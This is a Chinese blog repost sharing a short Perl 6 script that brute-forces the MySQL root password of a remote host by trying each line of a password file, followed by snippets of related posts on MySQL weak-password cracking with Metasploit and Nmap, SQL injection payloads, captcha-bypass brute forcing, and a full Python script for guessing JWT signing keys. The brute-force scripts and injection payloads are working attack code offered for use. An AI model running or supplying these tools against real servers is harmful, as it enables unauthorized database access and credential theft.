一个简单的爆破 mysql 远程连接脚本(perl6)

最新推荐文章于 2024-06-05 14:08:52 发布
转载 最新推荐文章于 2024-06-05 14:08:52 发布 · 264 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/perl6/p/8308218.html
文章标签:

#数据库

本文介绍了一个Perl脚本,该脚本尝试使用不同的密码从文件中读取并建立数据库连接。通过循环读取密码文件的内容,脚本使用DBIish模块(假设为DBI)尝试连接到MySQL数据库。 
sub MAIN(Str $host) {
  use DBIish;
  my $file = open 'password.txt';
  while $file.get -> $line {
      my $password = $line.chomp;
      say 'Guess: '~$password;

    #错误处理
    try {
        my $dbh = DBIish.connect('mysql', :host($host), :port(3306),
                :database<mysql>, :user<root>, :password($password));


        if so $dbh {
          say 'Done!';
          say 'password is ---> '~$password;
          exit;
        }
        CATCH {
          default {}
        }
      }
      #处理结束
      #当为真时说明连接成功

}

}

 

 

 

效果如下:


转载于:https://www.cnblogs.com/perl6/p/8308218.html

vulhub通关实战一(附docker vulhub 虚拟机环境)
悦分享
12-26 2155
docker vulhub 虚拟机环境:docker-compose up -d 启动服务:登录7001端口用户名weblogic,密码Oracle@123。
mysql数据库暴破
04-08
该资源为python编写的mysql暴力破解软件,采用多线程编写,爆破速度非常快。
python 构造mysql爆破
weixin_30457881的博客
07-06 439
前言: 今天已经期末考完,睡了个觉起床写了个 mysql爆破器. 思路: 1.爆破用户->用户存在的话不会报错反之报错 2.爆破密码->密码正确不会报错反之报错 3.用户名和密码一起爆破->用户名和密码正确不会报错反之报错 用到的模块: optparser pymysql configparser os 代码: import pymysql ...
msf-mysql弱口令爆破
西部壮仔的博客
02-29 4281
实验环境: 攻击机:kali 被攻击方:windows 7 (phpstudy上的mysql服务) 前提是对方必须开启mysql远程登陆服务,开启了3306端口 如何启动mysql远程登陆,可参考这篇文章 https://blog.youkuaiyun.com/qq_45089570/article/details/104569254 开始攻击 use auxiliary/scanner/mysql/mys...
#我的武器库系列#之mysql数据库爆破核心实现
MR王峰的专栏
07-12 409
我们日常业务系统常用mysql、sqlserver、oracle、db2等,多数开发人员以功能为导向,缺少安全意识,在设计开发时数据库对外权限没有进行有效设置,导致可通过外部IP方进行连接访问。该问题存在非常大的安全隐患,渗透人员利用字典表通过穷举方式进行暴力破解,一旦渗透成功,危害不言而喻。 源代码只实现了mysql的穷举破解,sqlserver、oracle类似,不在此复...
mysql弱密码爆破及利用方法
m0_75198157的博客
04-08 735
linux kali2021中已经安装了mysql,所以可以在终端中使用mysql命令登录。在windows中,如果安装了mysql,在mysql/bin/mysql.exe。3、利用我们爆破出的用户名和密码,使用mysql客户端登录远程mysql服务器。执行成功后,可以用 菜刀连接,打开flagvalue.txt文件。可以看到:默认端口3306 默认用户名:root。需要在mysql服务器上开启写入文件的权限。这个变量默认的值是空值,表示不允许写入。修改目录的权限为完全的权限。
绕过验证码爆破==>captcha-killer插件
最新发布
zkaq7777777的博客
06-05 2236
想必大家都会使用burp进行爆破,当遇到带验证码的登录表单进行爆破时,基本尝试抓包后观察验证码是否主动更新,或者进行验证码绕过(我是十八期萌新,听风风说的有这个方法,但我还没学到),机缘巧合下我接触到了captcha-killer这个插件,可以提供给大家第三种爆破思路(我的插件和脚本打包放在文章附件了,插件也可以从GitHub下载)(https://github.com/c0ny1/captcha-killer “GitHub下载链接以及部分资料地址”)
18-OWASP top10--SQL注入(三、MSSQL、Mysql手工注入及Sqlmap工具使用)
XLbb的博客
05-27 1553
' 与and 1=1 and 1=2--检查注入点 ' order by 1,2--+&Submit=Submit#--检查字段 ' union select user(),version()--+&Submit=Submit# --查看数据库用户名和版本、库名 'union select 1,group_concat(schema_name) from inform 注入防御 1、涵数过滤 2、直接下载相关防范注入文件,通过incloud包含放在网站配置文件里面 3、PDO预处理
当Windows遇上PHP–路径爆破
Coisini的博客
06-05 828
.开场白 此次所披露的是以下网页中提出的问题所取得的测试结果: http://code.google.com/p/pasc2at/wiki/SimplifiedChinese &lt;?php for ($i=0; $i&lt;255; $i++) { $url = '1.ph' . chr($i); $tmp = @file_get_contents($url); if (!...
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 6290
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
Python版Mysql爆破脚本
09-09
本文给大家分享的是使用Python制作的MySQL在线用户密码的暴力破解脚本,非常的好用,有需要的小伙伴可以参考下
Nmap爆破MySQL弱口令漏洞:解决报错Accounts: No valid accounts found
mooyuan的网络安全博客
11-23 4738
nmap工具不仅仅能扫描,也可以暴力破解mysql,ftp,telnet等服务。看到这里不要怀疑,在kali系统中查一下到底支持哪些暴力破解功能,命令如下查询结果为如上查询结果包括mysql、ftp、telnet等多个服务的暴力破解。接下来就以MySQL为例讲一下如何就是用nmap进行暴力破解获取MySQL的弱口令漏洞,以及如何解决windows下小皮工具搭建的MySQL服务无法渗透成功的问题。
第六天 02.mysql数据库的基本操作和密码爆破
qq_56414082的博客
01-02 1158
数据库是什么​ 存储数据的仓库,数据是有组织的进行存储。mysql是一种关系数据库管理系统使用工具:phpstudymysql 默认端口 3306
mysql爆破python脚本
m0_73896875的博客
07-06 338
print(f"成功登录 - 主机名:{hostname},用户名:{username},密码:{password}")print(f"登录失败 - 主机名:{hostname},用户名:{username},密码:{password}")print(f"成功登录 - 主机名:{hostname},用户名:{username},密码:{password}")print(f"登录失败 - 主机名:{hostname},用户名:{username},密码:{password}")@Author :星之尘。
perl 远程 mysql_perl联接mysql
weixin_36357218的博客
01-28 180
perl连接mysql1、安装DBI模块通用方式:cmd->perl -MCPAN -e shell->install dbd::mysqlwindow专有方式:cmd->ppm install DBI->ppm install dbd::mysql。2、准备数据库这里以系统数据库mysql为例。3、编写Perl脚本#!/usr/bin/perl use DBI; my $...
利用MySQL暴力破解实现远程控制
m0_61869253的博客
03-07 1519
一、信息收集利用nmap工具扫描靶机3306端口开启情况!发现靶机开启3306端口,MySQL数据库二、渗透测试打开msfconsole渗透测试平台!搜索mysql_login漏洞模块!使用auxiliary/scanner/mysql/mysql_login漏洞攻击模块use 0!查看需要配置的参数!设置密码字典!设置目标IP!设置爆破用户名!运行exploit!成功爆破出密码 P@sswrd三、远程登录使用我们爆破出的用户名密码远程登录MySQL数据库
用Python写了个工具,完美破解了MySQL!!(建议收藏)
热门推荐
冰河的专栏
07-01 4万+
再也不怕忘记MySQL的用户名和密码了,用这个工具可以秒破MySQL,冰河强烈建议收藏!!
Python写一个jwt爆破脚本
07-25
当然可以!下面是一个使用Python编写的JWT爆破脚本的示例: ```python import jwt def brute_force_jwt(secret_key, token): # 生成payload字典,可以根据需要修改 payload = {'username': 'admin'} # 尝试不同的密钥进行解码 for key in secret_key: try: # 使用当前密钥解码token decoded = jwt.decode(token, key=key, algorithms=['HS256']) print(f'Successfully decoded JWT with key: {key}') print(decoded) return True except jwt.InvalidSignatureError: # 密钥不匹配,继续尝试下一个密钥 continue # 如果没有找到合适的密钥,则爆破失败 print('Failed to crack JWT') return False # 设置密钥列表和要爆破的JWT secret_keys = ['secret1', 'secret2', 'secret3'] jwt_token = 'YOUR_JWT_TOKEN_HERE' # 调用爆破函数 brute_force_jwt(secret_keys, jwt_token) ``` 在上面的示例中,我们使用`jwt`库来进行JWT的解码。您需要将`secret_keys`替换为要尝试的密钥列表,并将`jwt_token`替换为要爆破的JWT。 请注意,JWT爆破是一种破解手段,可能会违反法律和伦理规范。请确保您只在合法且授权的范围内使用此脚本
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值